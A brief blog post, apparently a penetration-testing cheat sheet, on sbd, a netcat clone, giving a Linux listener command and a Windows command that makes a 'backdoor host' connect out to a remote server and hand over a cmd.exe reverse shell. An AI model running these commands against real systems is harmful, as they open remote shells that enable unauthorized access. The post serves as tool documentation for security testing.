sbd – sbd.exe

sbd is a clone of netcat.
There are windows and linux binaries available.
Windows binary can be downloaded from kali distro.

Typical usage.

Reverse shell from Windows to Linux
Start listener on linux
# sbd -lvvp 80 -k letmein
-k is secret key
-p port to listen on

Backdoor host connects to remote listener and starts shell locally.
c:\>sbd -p 80 -e cmd.exe -k letmein http://www.myserver.com

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s